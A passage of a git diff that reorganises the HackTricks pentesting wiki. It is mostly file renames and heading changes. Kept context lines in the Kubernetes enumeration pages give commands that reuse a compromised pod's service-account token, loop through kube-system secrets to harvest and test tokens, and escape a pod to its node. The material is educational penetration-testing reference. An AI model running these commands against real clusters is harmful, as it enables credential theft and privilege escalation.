Leaking LIBC template](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md) - * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md) - * [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md) - * [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md) -* [Exploiting Tools](exploiting/tools/README.md) - * [PwnTools](exploiting/tools/pwntools.md) -* [Windows Exploiting (Basic Guide - OSCP lvl)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md) * [Certificates](cryptography/certificates.md) * [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md) * [Crypto CTFs Tricks](cryptography/crypto-ctfs-tricks.md) diff --git a/cloud-security/cloud-security.md b/cloud-security/cloud-security.md new file mode 100644 index 000000000..a2c5feb1a --- /dev/null +++ b/cloud-security/cloud-security.md @@ -0,0 +1,2 @@ +# Cloud Security + diff --git a/pentesting/pentesting-kubernetes/README.md b/cloud-security/pentesting-kubernetes/README.md similarity index 100% rename from pentesting/pentesting-kubernetes/README.md rename to cloud-security/pentesting-kubernetes/README.md diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md index 87fae6c01..095be9279 100644 --- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md +++ b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md @@ -163,8 +163,8 @@ kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hos Now that you can escape to the node check post-exploitation techniques in: -{% content-ref url="../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) +{% content-ref url="../attacking-kubernetes-from-inside-a-pod.md" %} +[attacking-kubernetes-from-inside-a-pod.md](../attacking-kubernetes-from-inside-a-pod.md) {% endcontent-ref %} #### Stealth diff --git a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md b/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md similarity index 100% rename from pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md rename to cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md diff --git a/pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md b/cloud-security/pentesting-kubernetes/exposing-services-in-kubernetes.md similarity index 100% rename from pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md rename to cloud-security/pentesting-kubernetes/exposing-services-in-kubernetes.md diff --git a/pentesting/pentesting-kubernetes/kubernetes-basics.md b/cloud-security/pentesting-kubernetes/kubernetes-basics.md similarity index 100% rename from pentesting/pentesting-kubernetes/kubernetes-basics.md rename to cloud-security/pentesting-kubernetes/kubernetes-basics.md diff --git a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md index c832471f9..28b522333 100644 --- a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md +++ b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md @@ -1,4 +1,4 @@ - +# Kubernetes Enumeration
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# Kubernetes Tokens +## Kubernetes Tokens If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**. @@ -25,9 +24,9 @@ In this folder you might find config files with **tokens and configurations to c If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env: -## Service Account Tokens +### Service Account Tokens -Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.** +Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](./#architecture)**.** Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server): @@ -60,15 +59,15 @@ Default location on **Minikube**: * /var/lib/localkube/certs -## Hot Pods +### Hot Pods _**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc. -# RBAC +## RBAC -If you don't know what is **RBAC**, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac). +If you don't know what is **RBAC**, [**read this section**](./#cluster-hardening-rbac). -# Enumeration CheatSheet +## Enumeration CheatSheet In order to enumerate a K8s environment you need a couple of this: @@ -80,7 +79,7 @@ With those details you can **enumerate kubernetes**. If the **API** for some rea However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. -## Differences between `list` and `get` verbs +### Differences between `list` and `get` verbs With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API: @@ -113,7 +112,7 @@ They open a streaming connection that returns you the full manifest of a Deploym The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get` {% endhint %} -## Using curl +### Using curl From inside a pod you can use several env variables: @@ -126,7 +125,7 @@ export CACERT=${SERVICEACCOUNT}/ca.crt alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\"" ``` -## Using kubectl +### Using kubectl Having the token and the address of the API server you use kubectl or curl to access it as indicated here: @@ -138,7 +137,7 @@ You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/doc To find the HTTP request that `kubectl` sends you can use the parameter `-v=8` -## Current Configuration +### Current Configuration {% tabs %} {% tab title="Kubectl" %} @@ -167,7 +166,7 @@ kubectl config set-credentials USER_NAME \ --auth-provider-arg=id-token=( your id_token ) ``` -## Get Supported Resources +### Get Supported Resources With this info you will know all the services you can list @@ -180,7 +179,7 @@ k api-resources --namespaced=false #Resources NOT specific to a namespace {% endtab %} {% endtabs %} -## Get Current Privileges +### Get Current Privileges {% tabs %} {% tab title="kubectl" %} @@ -205,8 +204,8 @@ kurl -i -s -k -X $'POST' \ You can learn more about **Kubernetes RBAC** in -{% content-ref url="../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md" %} -[kubernetes-role-based-access-control-rbac.md](../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) +{% content-ref url="kubernetes-role-based-access-control-rbac.md" %} +[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md) {% endcontent-ref %} **Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges: @@ -215,7 +214,7 @@ You can learn more about **Kubernetes RBAC** in [abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) {% endcontent-ref %} -## Get Others roles +### Get Others roles {% tabs %} {% tab title="kubectl" %} @@ -233,7 +232,7 @@ kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clu {% endtab %} {% endtabs %} -## Get namespaces +### Get namespaces Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**. @@ -251,7 +250,7 @@ kurl -k -v https://$APISERVER/api/v1/namespaces/ {% endtab %} {% endtabs %} -## Get secrets +### Get secrets {% tabs %} {% tab title="kubectl" %} @@ -276,7 +275,7 @@ If you can read secrets you can use the following lines to get the privileges re for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done ``` -## Get Service Accounts +### Get Service Accounts As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges. @@ -294,7 +293,7 @@ curl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts {% endtab %} {% endtabs %} -## Get Deployments +### Get Deployments The deployments specify the **components** that need to be **run**. @@ -313,7 +312,7 @@ curl -v https://$APISERVER/api/v1/namespaces//deployments/ {% endtab %} {% endtabs %} -## Get Pods +### Get Pods The Pods are the actual **containers** that will **run**. @@ -332,7 +331,7 @@ curl -v https://$APISERVER/api/v1/namespaces//pods/ {% endtab %} {% endtabs %} -## Get Services +### Get Services Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack. @@ -351,7 +350,7 @@ curl -v https://$APISERVER/api/v1/namespaces/default/services/ {% endtab %} {% endtabs %} -## Get nodes +### Get nodes Get all the **nodes configured inside the cluster**. @@ -369,7 +368,7 @@ curl -v https://$APISERVER/api/v1/nodes/ {% endtab %} {% endtabs %} -## Get DaemonSets +### Get DaemonSets **DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed. @@ -387,7 +386,7 @@ curl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets {% endtab %} {% endtabs %} -## Get cronjob +### Get cronjob Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action. @@ -405,7 +404,7 @@ curl -v https://$APISERVER/apis/batch/v1beta1/namespaces//cronjobs {% endtab %} {% endtabs %} -## Get "all" +### Get "all" {% tabs %} {% tab title="kubectl" %} @@ -415,7 +414,7 @@ k get all {% endtab %} {% endtabs %} -## **Get Pods consumptions** +### **Get Pods consumptions** {% tabs %} {% tab title="kubectl" %} @@ -425,7 +424,7 @@ k top pod --all-namespaces {% endtab %} {% endtabs %} -## Escaping from the pod +### Escaping from the pod If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes. @@ -480,11 +479,10 @@ chroot /root /bin/bash Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/) -# References +## References {% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %} -
Support HackTricks and get benefits! @@ -500,5 +498,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md b/cloud-security/pentesting-kubernetes/kubernetes-hardening/README.md similarity index 100% rename from pentesting/pentesting-kubernetes/kubernetes-hardening/README.md rename to cloud-security/pentesting-kubernetes/kubernetes-hardening/README.md diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md b/cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md similarity index 100% rename from pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md rename to cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md b/cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md similarity index 100% rename from pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md rename to cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md b/cloud-security/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md similarity index 100% rename from pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md rename to cloud-security/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md diff --git a/pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md b/cloud-security/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md similarity index 100% rename from pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md rename to cloud-security/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md diff --git a/cloud-security/pentesting-kubernetes/namespace-escalation.md b/cloud-security/pentesting-kubernetes/namespace-escalation.md index b348c4087..9fd4abde2 100644 --- a/cloud-security/pentesting-kubernetes/namespace-escalation.md +++ b/cloud-security/pentesting-kubernetes/namespace-escalation.md @@ -1,4 +1,4 @@ - +# Kubernetes Namespace Escalation
@@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. Here are some techniques you can try to escape to a different namespace: -## Abuse K8s privileges +### Abuse K8s privileges Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens. @@ -31,7 +30,7 @@ For more info about which privileges you can abuse read: [abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) {% endcontent-ref %} -## Escape to the node +### Escape to the node If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens: @@ -41,12 +40,10 @@ If you can escape to the node either because you have compromised a pod and you All these techniques are explained in: -{% content-ref url="../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) +{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} +[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) {% endcontent-ref %} - -
Support HackTricks and get benefits! @@ -62,5 +59,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md b/cloud-security/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md similarity index 100% rename from pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md rename to cloud-security/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md b/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/README.md similarity index 100% rename from a.i.-exploiting/bra.i.nsmasher-presentation/README.md rename to external-platforms-reviews-writeups/bra.i.nsmasher-presentation/README.md diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md b/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-bruteforcer.md similarity index 100% rename from a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md rename to external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-bruteforcer.md diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md b/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-captcha-breaker.md similarity index 100% rename from a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md rename to external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-captcha-breaker.md diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md b/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/bim-bruteforcer.md similarity index 100% rename from a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md rename to external-platforms-reviews-writeups/bra.i.nsmasher-presentation/bim-bruteforcer.md diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md b/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md similarity index 100% rename from a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md rename to external-platforms-reviews-writeups/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md b/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/README.md similarity index 100% rename from a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md rename to external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/README.md diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md b/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md similarity index 100% rename from a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md rename to external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md diff --git a/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md b/external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md similarity index 100% rename from courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md rename to external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md diff --git a/forensics/basic-forensic-methodology/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/README.md similarity index 100% rename from forensics/basic-forensic-methodology/README.md rename to generic-methodologies-and-resources/basic-forensic-methodology/README.md diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md similarity index 100% rename from forensics/basic-forensic-methodology/anti-forensic-techniques.md rename to generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md similarity index 100% rename from forensics/basic-forensic-methodology/docker-forensics.md rename to generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md similarity index 100% rename from forensics/basic-forensic-methodology/file-integrity-monitoring.md rename to generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md diff --git a/forensics/basic-forensic-methodology/image-adquisition-and-mount.md b/generic-methodologies-and-resources/basic-forensic-methodology/image-adquisition-and-mount.md similarity index 100% rename from forensics/basic-forensic-methodology/image-adquisition-and-mount.md rename to generic-methodologies-and-resources/basic-forensic-methodology/image-adquisition-and-mount.md diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md similarity index 100% rename from forensics/basic-forensic-methodology/linux-forensics.md rename to generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md similarity index 100% rename from forensics/basic-forensic-methodology/malware-analysis.md rename to generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md similarity index 100% rename from forensics/basic-forensic-methodology/memory-dump-analysis/README.md rename to generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md similarity index 100% rename from forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md rename to generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md similarity index 100% rename from forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md rename to generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ext.md similarity index 100% rename from forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md rename to generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ext.md diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md similarity index 100% rename from forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md rename to generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md similarity index 100% rename from forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md rename to generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md similarity index 100% rename from forensics/basic-forensic-methodology/pcap-inspection/README.md rename to generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md diff --git a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md similarity index 100% rename from forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md rename to generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md similarity index 100% rename from forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md rename to generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md similarity index 100% rename from forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md rename to generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md similarity index 100% rename from forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md rename to generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md similarity index 100% rename from forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md rename to generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md similarity index 100% rename from forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md rename to generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md similarity index 100% rename from forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md rename to generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md similarity index 100% rename from forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md rename to generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md similarity index 100% rename from forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md rename to generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md similarity index 100% rename from forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md rename to generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md similarity index 100% rename from forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md rename to generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md similarity index 100% rename from forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md rename to generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md similarity index 100% rename from forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md rename to generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md similarity index 100% rename from forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md rename to generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md similarity index 100% rename from forensics/basic-forensic-methodology/windows-forensics/README.md rename to generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md similarity index 100% rename from forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md rename to generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/windows-processes.md similarity index 100% rename from forensics/basic-forensic-methodology/windows-forensics/windows-processes.md rename to generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/windows-processes.md diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index d37d1cd4b..59beaa055 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -36,7 +36,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ### 0- Physical Attacks -Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](../physical-attacks/escaping-from-gui-applications/). +Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../hardware-physical-access/physical-attacks.md) and others about [**escaping from GUI applications**](../hardware-physical-access/escaping-from-gui-applications/). ### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/) @@ -146,9 +146,9 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve #### **Exploiting** -* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/) -* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md) -* [**Basic exploiting tools**](../exploiting/tools/) +* [**Basic Linux Exploiting**](../group-1/linux-exploiting-basic-esp/) +* [**Basic Windows Exploiting**](../group-1/windows-exploiting-basic-guide-oscp-lvl.md) +* [**Basic exploiting tools**](../group-1/tools/) #### [**Basic Python**](../misc/basic-python/) diff --git a/reversing/common-api-used-in-malware.md b/group-1/common-api-used-in-malware.md similarity index 100% rename from reversing/common-api-used-in-malware.md rename to group-1/common-api-used-in-malware.md diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/group-1/linux-exploiting-basic-esp/README.md similarity index 100% rename from exploiting/linux-exploiting-basic-esp/README.md rename to group-1/linux-exploiting-basic-esp/README.md diff --git a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md b/group-1/linux-exploiting-basic-esp/bypassing-canary-and-pie.md similarity index 100% rename from 